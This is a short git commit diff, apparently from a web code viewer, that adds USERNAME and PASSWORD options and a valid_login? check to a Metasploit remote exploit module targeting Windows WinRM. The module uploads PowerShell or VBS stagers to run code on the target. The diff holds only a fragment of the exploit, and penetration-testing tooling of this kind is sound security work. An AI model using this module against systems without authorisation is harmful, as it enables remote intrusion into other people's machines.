Login check fixes for exploit
parent
5e8b9a20a4
commit
5856874cea
|
@ -56,7 +56,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('FORCE_VBS', [ true, 'Force the module to use the VBS CmdStager', false])
|
||||
OptBool.new('FORCE_VBS', [ true, 'Force the module to use the VBS CmdStager', false]),
|
||||
OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),
|
||||
OptString.new('PASSWORD', [ true, 'A specific password to authenticate with' ]),
|
||||
], self.class
|
||||
)
|
||||
|
||||
|
@ -82,6 +84,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
unless check == Msf::Exploit::CheckCode::Vulnerable
|
||||
return
|
||||
end
|
||||
unless valid_login?
|
||||
print_error "Login Failure. Recheck your credentials"
|
||||
return
|
||||
end
|
||||
if powershell2?
|
||||
path = upload_script
|
||||
return if path.nil?
|
||||
|
@ -243,4 +249,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return false
|
||||
end
|
||||
|
||||
def valid_login?
|
||||
data = winrm_wql_msg("Select Name,Status from Win32_Service")
|
||||
resp,c = send_request_ntlm(data)
|
||||
unless resp.code == 200
|
||||
return false
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue